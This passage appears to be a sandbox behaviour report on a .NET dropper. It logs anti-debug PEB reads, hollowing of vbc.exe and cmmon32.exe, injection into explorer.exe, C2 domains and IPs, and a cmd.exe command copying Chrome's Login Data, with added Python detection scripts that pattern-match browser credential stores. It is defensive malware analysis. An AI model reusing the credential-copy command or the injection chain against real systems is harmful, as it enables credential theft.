          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A59080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A558EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\PO#12108997.exeMemory allocated: page read and write | page guard
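          Every `mov eax, dword ptr fs:[00000030h]` row above is a read of the PEB pointer out of the TEB. On its own that is weak evidence: the same instruction opens ordinary loader walks (PEB->Ldr at +0x0C) and heap code (PEB->ProcessHeap at +0x18). What turns it into an anti-debug indicator is the field dereferenced next: BeingDebugged at +0x02 or NtGlobalFlag at +0x68, whose heap-checking bits (0x70) are set when a process starts under a debugger. The `Process queried: DebugPort` rows are the complementary NtQueryInformationProcess(ProcessDebugPort) check. The scanner below is an added example, not code from the Joe Sandbox report or from the sample: it finds both common encodings of `mov r32, fs:[30h]` in a raw code buffer and decodes the immediately following `mov`/`movzx [reg+disp8]` to name the PEB field. The input bytes are hand-assembled for this example, and the decoder deliberately handles only the direct disp8 form (a read that goes through an intermediate register or a disp32 is reported with `field` set to None), which is a stated limitation rather than a property of the sample.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# 32-bit PEB field offsets (public layout). Which field follows the fs:[30h]
# read is what separates an anti-debug check from ordinary loader/heap code.
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x0C: "Ldr",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",
}

# `mov r32, fs:[30h]` has two encodings: 64 A1 30 00 00 00 (eax only, moffs32)
# and 64 8B /r with mod=00 rm=101 (disp32) for any general register.
PEB_READ = re.compile(rb"\x64(?:\xA1|\x8B([\x05\x0D\x15\x1D\x35\x3D]))\x30\x00\x00\x00")
MODRM_TO_REG = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx", 0x35: "esi", 0x3D: "edi"}
REG_INDEX = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3, "esi": 6, "edi": 7}


@dataclass
class PebRead:
    offset: int            # byte offset of the fs:[30h] instruction in the buffer
    register: str          # register that holds the PEB pointer afterwards
    field: Optional[str]   # PEB field read right after, if the next instruction is recognised


def _follow_up_field(buf: bytes, pos: int, base: str) -> Optional[str]:
    """Recognise `mov r32,[base+disp8]` (8B /r) or `movzx r32, byte [base+disp8]`
    (0F B6 /r) directly after the PEB read and map disp8 to a PEB field name."""
    if buf[pos:pos + 1] == b"\x8B":
        modrm_at = pos + 1
    elif buf[pos:pos + 2] == b"\x0F\xB6":
        modrm_at = pos + 2
    else:
        return None
    if modrm_at + 1 >= len(buf):
        return None
    modrm = buf[modrm_at]
    # mod must be 01 (8-bit displacement) and rm must be the register holding the PEB
    if (modrm & 0xC0) != 0x40 or (modrm & 0x07) != REG_INDEX[base]:
        return None
    disp8 = buf[modrm_at + 1]
    return PEB_FIELDS.get(disp8, f"PEB+0x{disp8:02X}")


def find_peb_reads(buf: bytes) -> list[PebRead]:
    hits = []
    for m in PEB_READ.finditer(buf):
        reg = "eax" if m.group(1) is None else MODRM_TO_REG[m.group(1)[0]]
        hits.append(PebRead(m.start(), reg, _follow_up_field(buf, m.end(), reg)))
    return hits


def anti_debug_fields(hits: list[PebRead]) -> set[str]:
    """Only BeingDebugged and NtGlobalFlag reads are an anti-debug signal by themselves."""
    return {h.field for h in hits if h.field in ("BeingDebugged", "NtGlobalFlag")}


# Constructed input, hand-assembled for this example; these are not bytes from the sample.
SAMPLE = (
    b"\x55\x8B\xEC"                   # push ebp ; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"       # mov eax, fs:[30h]
    b"\x0F\xB6\x40\x02"               # movzx eax, byte ptr [eax+2]   ; BeingDebugged
    b"\x85\xC0\x75\x05"               # test eax, eax ; jnz short
    b"\x64\x8B\x0D\x30\x00\x00\x00"   # mov ecx, fs:[30h]
    b"\x8B\x41\x68"                   # mov eax, [ecx+68h]            ; NtGlobalFlag
    b"\x25\x70\x00\x00\x00"           # and eax, 70h ; heap-check bits set under a debugger
    b"\xC3"                           # ret
)

if __name__ == "__main__":
    hits = find_peb_reads(SAMPLE)
    for h in hits:
        print(f"+0x{h.offset:04X}: PEB -> {h.register}, then reads {h.field}")
    print("anti-debug fields:", sorted(anti_debug_fields(hits)))
```

          Run it over a dumped code section (for example the memory region around 17_2_04B11C06 carved from the cmmon32.exe dump) rather than the packed file on disk, because the packed .NET dropper does not contain this native code at all; the hits only appear in the hollowed host's memory.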

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe Network Connect: 188.114.97.10 80
          Source: C:\Windows\explorer.exe Domain query: www.tyz.world
          Source: C:\Windows\explorer.exe Domain query: www.madurababe.net
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: B20000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968
          Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3968
          Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: explorer.exe, 00000005.00000000.340347852.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308579342.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273499880.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
          Source: explorer.exe, 00000005.00000000.279299320.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.299907153.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.316538894.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.291781655.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273520311.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
          Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
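          Read together, the rows in this section are one chain rather than independent findings: the dropper starts vbc.exe with a command line that is nothing but the image path (a compiler with nothing to compile), vbc.exe maps execute-read-write sections into explorer.exe and drives a thread there through a queued APC and a thread-context write, vbc.exe also unmaps cmmon32.exe's image at B20000 and loads executable sections into it, explorer.exe is the process that then performs the HTTP connects and domain queries, and the hollowed cmmon32.exe spawns cmd.exe to copy Chrome's Login Data SQLite store to %TEMP%. Each row alone is weak (cmmon32.exe mapping a plain read-write section into explorer.exe is not evidence by itself), so a detection should score the chain, not the rows. The Python below is an added example, not part of the Joe Sandbox report or its rule set: it re-expresses the rows above as constructed events and runs five simple rules over them. The lists of .NET host binaries beyond vbc.exe, of build tools and of browsers are assumptions made for the example, and the benign control event at the end is invented to show what the rules do not fire on.

```python
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str              # process_create | section_map | section_unmap | apc_queue | thread_context
    source: str            # acting process image path
    target: str = ""       # child image (process_create) or injection target (image path or PID)
    cmdline: str = ""      # child command line (process_create only)
    protection: str = ""   # mapped-section protection (section_map only)


# .NET Framework tools commonly abused as hollowing hosts; everything beyond vbc.exe
# is an assumption of this example, not something the report shows.
DOTNET_HOSTS = {"vbc.exe", "csc.exe", "regasm.exe", "regsvcs.exe", "installutil.exe"}
BUILD_TOOLS = {"msbuild.exe", "devenv.exe"}             # assumed legitimate parents of vbc.exe
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # assumed legitimate readers of the stores
# Chromium credential/cookie stores; "Login Data" is the one copied in the report.
BROWSER_STORES = re.compile(r'\\(Login Data|Web Data|Cookies)"', re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events: list[Event]) -> list[tuple[str, str, str]]:
    """Return (rule, source, detail) findings for a stream of events."""
    findings = []
    for ev in events:
        src, tgt = basename(ev.source), basename(ev.target)
        if ev.kind == "process_create":
            # A .NET tool whose command line is just its own path has nothing to
            # compile; launched from outside a build tool it is a hollowing host.
            bare = ev.cmdline.strip().strip('"') == ev.target
            if tgt in DOTNET_HOSTS and bare and src not in BUILD_TOOLS:
                findings.append(("dotnet_tool_started_without_args", ev.source, ev.target))
            # Shell copy of a browser credential store by a non-browser parent.
            if (tgt == "cmd.exe" and "copy" in ev.cmdline.lower()
                    and BROWSER_STORES.search(ev.cmdline) and src not in BROWSERS):
                findings.append(("browser_credential_store_copy", ev.source, ev.cmdline))
        elif ev.kind == "section_map":
            # Executable memory mapped into another process. A read-write-only
            # mapping (as cmmon32.exe -> explorer.exe also does) is not flagged.
            if "execute" in ev.protection.lower() and src != tgt:
                findings.append(("executable_section_in_foreign_process", ev.source, ev.target))
        elif ev.kind == "section_unmap":
            # Unmapping another process's image is the first step of hollowing.
            if src != tgt:
                findings.append(("foreign_image_unmapped", ev.source, ev.target))
        elif ev.kind in ("apc_queue", "thread_context"):
            # Remote APC or SetThreadContext against a thread we do not own.
            if src != tgt:
                findings.append(("remote_thread_control", ev.source, f"{ev.kind} -> {ev.target}"))
    return findings


VBC = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CMMON = r"C:\Windows\SysWOW64\cmmon32.exe"

# Constructed from the rows above, plus one invented benign control at the end.
# This is the report's rows re-expressed as events, not a real telemetry feed.
EVENTS = [
    Event("process_create", r"C:\Users\user\Desktop\PO#12108997.exe", VBC, VBC),
    Event("section_unmap", VBC, CMMON),
    Event("section_map", VBC, EXPLORER, protection="execute and read and write"),
    Event("section_map", VBC, CMMON, protection="execute and read and write"),
    Event("apc_queue", VBC, EXPLORER),
    Event("thread_context", VBC, "3968"),
    Event("thread_context", CMMON, "3968"),
    Event("section_map", CMMON, EXPLORER, protection="read write"),
    Event("process_create", CMMON, r"C:\Windows\SysWOW64\cmd.exe",
          r'/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" '
          r'"C:\Users\user\AppData\Local\Temp\DB1" /V'),
    # benign control: a build tool invoking the compiler with real arguments
    Event("process_create", r"C:\Program Files\MSBuild\msbuild.exe", VBC,
          f'"{VBC}" /noconfig /out:app.dll app.vb'),
]

if __name__ == "__main__":
    for rule, source, detail in evaluate(EVENTS):
        print(f"{rule:40} {basename(source):12} {detail}")
```

          The thread-context rows name the target only by PID (3968), so the rule compares image names where it has them and falls back to the PID string otherwise; in a real pipeline the PID would be resolved against the process tree first. Note also that the rule set deliberately does not fire on explorer.exe's own network activity: that row is what makes the injection matter, but "system process connects to 34.102.136.180:80" is a conclusion to draw from the chain, not a rule that survives on a real desktop.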
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Users\user\Desktop\PO#12108997.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
